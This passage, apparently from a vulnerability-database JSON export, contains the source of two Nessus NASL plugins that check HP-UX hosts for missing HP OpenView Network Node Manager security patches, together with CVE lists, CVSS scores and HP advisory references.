\"CVE-2009-0720\");\n script_bugtraq_id(34738, 34812);\n script_xref(name:\"HP\", value:\"emr_na-c01646081\");\n script_xref(name:\"HP\", value:\"emr_na-c01723303\");\n script_xref(name:\"HP\", value:\"emr_na-c01728300\");\n script_xref(name:\"HP\", value:\"SSRT080091\");\n script_xref(name:\"HP\", value:\"SSRT080125\");\n script_xref(name:\"HP\", value:\"SSRT080144\");\n\n script_name(english:\"HP-UX PHSS_39246 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 22\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 22 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to allow\n execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02424 SSRT080125)\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02425 SSRT080091)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01646081\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdefacfb\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01723303\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45827469\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01728300\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0bbcab1d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_39246 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(94, 119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/18\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/06/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23 11.31\", proc:\"ia64\"))\n{\n exit(0, \"The host is not affected since PHSS_39246 applies to a different OS release / architecture.\");\n}\n\npatches = make_list(\"PHSS_39246\", \"PHSS_39640\", \"PHSS_39945\", \"PHSS_40375\", \"PHSS_40708\", \"PHSS_41243\", \"PHSS_41607\", \"PHSS_41858\", \"PHSS_42233\", \"PHSS_43047\", \"PHSS_43354\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-IPV6\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-KOR\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-DOC-REUS\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrRtDOC.OVNNM-ENG-DOC\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVPMD-MIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.50.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.50.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:52:40", "references": ["http://www.nessus.org/u?d5f413ca", "http://www.nessus.org/u?ed695dee", "http://www.nessus.org/u?0bbcab1d", "http://www.nessus.org/u?45827469", "http://www.nessus.org/u?cdefacfb", "http://www.nessus.org/u?422f4693"], "pluginID": "46261", "description": "s700_800 11.11 OV NNM7.01 Intermediate Patch 13 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02424 SSRT080125)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code. References: CVE-2009-0898 (SSRT090101) CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846 (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128, ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522) CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176 (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132, ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539) CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180 (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164, ZDI-CAN-549). (HPSBMA02483 SSRT090257)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to allow execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - Potential vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code. (HPSBMA02416 SSRT090008)\n\n - Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These vulnerabilities could be exploited remotely to execute arbitrary code. References: CVE-2010-1550 (SSRT090225, ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564) CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553 (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229, ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential vulnerability has been identified with HP OpenView Network Node Manager (OV NNM). The vulnerability could be exploited remotely to execute arbitrary code. (HPSBMA02425 SSRT080091)", "edition": 6, "reporter": "Tenable", "published": "2010-05-10T00:00:00", "title": "HP-UX PHSS_40705 : s700_800 11.11 OV NNM7.01 Intermediate Patch 13", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3848", "CVE-2009-3846", "CVE-2009-3847", "CVE-2009-4177", "CVE-2009-0921", "CVE-2009-4180", "CVE-2009-3849", "CVE-2009-0898", "CVE-2009-4181", "CVE-2010-1555", "CVE-2009-4176", "CVE-2009-4178", "CVE-2010-1552", "CVE-2009-4179", "CVE-2008-2438", "CVE-2009-0920", "CVE-2010-1550", "CVE-2008-0067", "CVE-2010-1554", "CVE-2010-1553", "CVE-2009-3845", "CVE-2009-0720", "CVE-2010-1551"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_40705.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46261", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_40705. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46261);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2008-0067\", \"CVE-2008-2438\", \"CVE-2009-0720\", \"CVE-2009-0898\", \"CVE-2009-0920\", \"CVE-2009-0921\", \"CVE-2009-3845\", \"CVE-2009-3846\", \"CVE-2009-3847\", \"CVE-2009-3848\", \"CVE-2009-3849\", \"CVE-2009-4176\", \"CVE-2009-4177\", \"CVE-2009-4178\", \"CVE-2009-4179\", \"CVE-2009-4180\", \"CVE-2009-4181\", \"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\", \"CVE-2010-1553\", \"CVE-2010-1554\", \"CVE-2010-1555\");\n script_bugtraq_id(34738, 34812);\n script_xref(name:\"HP\", value:\"emr_na-c01646081\");\n script_xref(name:\"HP\", value:\"emr_na-c01696729\");\n script_xref(name:\"HP\", value:\"emr_na-c01723303\");\n script_xref(name:\"HP\", value:\"emr_na-c01728300\");\n script_xref(name:\"HP\", value:\"emr_na-c01950877\");\n script_xref(name:\"HP\", value:\"emr_na-c02153379\");\n script_xref(name:\"HP\", value:\"SSRT010098\");\n script_xref(name:\"HP\", value:\"SSRT080091\");\n script_xref(name:\"HP\", value:\"SSRT080125\");\n script_xref(name:\"HP\", value:\"SSRT080144\");\n script_xref(name:\"HP\", value:\"SSRT090008\");\n script_xref(name:\"HP\", value:\"SSRT090257\");\n\n script_name(english:\"HP-UX PHSS_40705 : s700_800 11.11 OV NNM7.01 Intermediate Patch 13\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 OV NNM7.01 Intermediate Patch 13 : \n\nThe remote HP-UX host is affected by multiple vulnerabilities :\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02424 SSRT080125)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2009-0898 (SSRT090101)\n CVE-2009-3845 (SSRT090037, ZDI-CAN-453) CVE-2009-3846\n (SSRT090122, ZDI-CAN-526) CVE-2009-3847 (SSRT090128,\n ZDI-CAN-532) CVE-2009-3848 (SSRT090129, ZDI-CAN-522)\n CVE-2009-3849 (SSRT090130, ZDI-CAN-523) CVE-2009-4176\n (SSRT090131, ZDI-CAN-532) CVE-2009-4177 (SSRT090132,\n ZDI-CAN-538) CVE-2009-4178 (SSRT090133, ZDI-CAN-539)\n CVE-2009-4179 (SSRT090134, ZDI-CAN-540) CVE-2009-4180\n (SSRT090135, ZDI-CAN-542) CVE-2009-4181 (SSRT090164,\n ZDI-CAN-549). (HPSBMA02483 SSRT090257)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to allow\n execution of arbitrary code. (HPSBMA02400 SSRT080144)\n\n - Potential vulnerabilities have been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerabilities could be exploited remotely to execute\n arbitrary code. (HPSBMA02416 SSRT090008)\n\n - Potential security vulnerabilities have been identified\n with HP OpenView Network Node Manager (OV NNM). These\n vulnerabilities could be exploited remotely to execute\n arbitrary code. References: CVE-2010-1550 (SSRT090225,\n ZDI-CAN-563) CVE-2010-1551 (SSRT090226, ZDI-CAN-564)\n CVE-2010-1552 (SSRT090227, ZDI-CAN-566) CVE-2010-1553\n (SSRT090228, ZDI-CAN-573) CVE-2010-1554 (SSRT090229,\n ZDI-CAN-574) CVE-2010-1555 (SSRT090230, ZDI-CAN-575).\n (HPSBMA02527 SSRT010098)\n\n - A potential vulnerability has been identified with HP\n OpenView Network Node Manager (OV NNM). The\n vulnerability could be exploited remotely to execute\n arbitrary code. (HPSBMA02425 SSRT080091)\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01646081\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdefacfb\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ed695dee\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01723303\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?45827469\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01728300\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0bbcab1d\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?422f4693\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5f413ca\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHSS_40705 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'White_Phosphorus');\n script_cwe_id(94, 119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/26\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHSS_40705 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHSS_40705\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-CORE\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PD\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMETCore.OVNNMET-PESA\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVMIB-CONTRIB\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNM-RUN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-JPN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVNNMGR-SCH\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVRPT-RUN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-JPN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgr.OVWWW-SCH\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVNNMgrMan.OVNNM-RUN-MAN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVDB-RUN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVEVENT-MIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVMIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVSNMP-MIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWIN\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-EVNT\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-FW\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatform.OVWWW-SRV\", version:\"B.07.01.00\")) flag++;\nif (hpux_check_patch(app:\"OVPlatformMan.OVEVENTMIN-MAN\", version:\"B.07.01.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}